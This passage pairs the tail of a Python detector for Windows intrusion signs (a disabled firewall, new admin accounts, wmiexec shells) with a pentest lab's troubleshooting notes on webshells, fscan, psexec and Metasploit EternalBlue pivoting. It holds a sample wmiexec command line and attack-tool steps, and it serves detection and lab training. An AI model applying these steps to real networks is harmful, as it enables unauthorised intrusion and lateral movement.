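    {"t": 131, "EventID": 4950, "ProfileChanged": "Public", "SettingType": "Enable Windows Firewall", "SettingValue": "No"},
    {"t": 200, "EventID": 4720, "TargetUserName": "hack02", "SubjectUserName": "ROOT-TVI862UBEH$"},
    {"t": 205, "EventID": 4732, "TargetUserName": "Administrators", "MemberName": "hack02"},
    {"t": 900, "EventID": 4720, "TargetUserName": "svc_backup", "SubjectUserName": "Administrator"},  # never made admin: benign
    {"t": 1500, "EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe",
     "CommandLine": "cmd.exe /Q /c whoami 1> \\\\127.0.0.1\\ADMIN$\\__1716450000.12 2>&1"},
    {"t": 1600, "EventID": 1, "Image": "C:\\Windows\\System32\\cmd.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "cmd.exe"},  # ordinary console: benign
]


def detect(events):
    """Return (t, rule, detail) alerts, in time order."""
    alerts = []
    created = {}  # lowercase username -> time of its 4720, for the 4720/4732 correlation
    for e in sorted(events, key=lambda ev: ev["t"]):
        eid = e["EventID"]
        if eid == 4657:
            if e.get("ObjectValueName", "").lower() == "fdenytsconnections" and e.get("NewValue") == "0":
                alerts.append((e["t"], "rdp_enabled_via_registry", e.get("SubjectUserName", "?")))
        elif eid == 4950:
            if e.get("SettingType") == "Enable Windows Firewall" and e.get("SettingValue") == "No":
                alerts.append((e["t"], "firewall_profile_disabled", e.get("ProfileChanged", "?")))
        elif eid == 4720:
            created[e["TargetUserName"].lower()] = e["t"]
        elif eid == 4732 and e.get("TargetUserName") == "Administrators":
            member = e.get("MemberName", "").lower()
            if member in created and e["t"] - created[member] <= ADMIN_WINDOW:
                alerts.append((e["t"], "new_user_added_to_administrators", member))
        elif eid == 1:  # Sysmon process creation
            parent = e.get("ParentImage", "").rsplit("\\", 1)[-1].lower()
            cmd = e.get("CommandLine", "")
            # wmiexec.py runs "cmd.exe /Q /c <cmd> 1> \\127.0.0.1\ADMIN$\__<ts> 2>&1"
            # under WmiPrvSE.exe and reads the output file back over SMB.
            if parent == "wmiprvse.exe" and "admin$\\__" in cmd.lower():
                alerts.append((e["t"], "wmiexec_shell", cmd))
    return alerts


if __name__ == "__main__":
    for t, rule, detail in detect(SAMPLE_EVENTS):
        print(f"t={t:<5} {rule:<34} {detail}")
```

The new-user rule deliberately correlates two events instead of alerting on every 4720: account creation is routine, a fresh account landing in Administrators within minutes is not. The registry rule silently misses everything unless the Terminal Server key is actually audited, which is the first thing to verify when deploying it.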

✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌

Assorted problems

shell.php has nothing in it

Problem:
(screenshot)
Solution: the log feature was not enabled (OFF); run the SQL to switch it ON.

Garbled Chinese in AntSword

Problem:
(screenshot)
Solution: chcp 65001
(screenshot)
No luck, that did not fix it; switched to Godzilla instead.

yxcms login

Problem: clicking Login on the site page does not get in.
(screenshot)
Solution: wrong URL; that is the user login page, not the way into the admin backend.

hack01 cannot query the domain

Problem:
(screenshot)
Solution: look at the prompt, it says so plainly: hack01 has no rights in the domain. hack01 is a local administrator; its rights are limited to this machine and do not extend to the domain.

Adding a domain user

Problem:
(screenshot)
Solution: to add a domain member you have to take the domain controller; the account can only be added on the DC.

The uploaded fscan will not run

Problem:
(screenshot)
Solution: possibly the wrong build, possibly no permission, possibly killed by antivirus. Skipped it; downloading it onto Win10 already triggers an AV alert, so being killed is the more likely cause.

/smb/psexec does not get through

138 does not get through
(screenshot)
141 does not get through either
(screenshot)
Solution: nothing in this world is hard, as long as you are willing to give up.

EternalBlue SMB error

Problem: [-] 192.168.52.138:445 - An SMB Login Error occurred while connecting to the IPC$ tree.
(screenshot)
Solution: it seems SMBDomain / SMBUser / SMBPass were not set; I set them later and it still did not help, gave up.

Downloading and installing the impacket toolkit

Problem: the git clone command from 谢公子's article would not pull.
(screenshot)
(screenshot)
Solution: git clone https://github.com/SecureAuthCorp/impacket.git

Mysterious problems

Problem: when using the EternalBlue module (use exploit/windows/smb/ms17_010_eternalblue) the word Died shows up, and running it reports a time out.
(screenshot)
138 => time out
(screenshot)
141 => time out
(screenshot)
Analysis:

There are three prerequisites for getting a session here:

  1. The shell connection between Kali and Win7 must not drop:
  • use exploit/multi/handler to catch the reverse-shell callback
  • autoroute -s 192.168.52.0/24 to add the route
  • bg to background the session
  2. msf has the proxy running:
  • use auxiliary/server/socks_proxy to configure the proxy
  • jobs to check that the proxy job is running
  3. Kali's proxy is configured:
  • vi /etc/proxychains4.conf

If the EternalBlue module (use exploit/windows/smb/ms17_010_eternalblue) shows Died, the backgrounded session has dropped: reconnect, add the route, bg it again, use auxiliary/server/socks_proxy, configure the proxy and run it, then check with jobs that the proxy is up.

Result: still did not get through; fixing the timeout brought up another problem, one bug fixed and another appears. But I have seen some uploaders' videos where ms17-010 really did succeed, so in the end I decided to file this under "mysterious", let it go, and be a salted fish~~

✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌✌
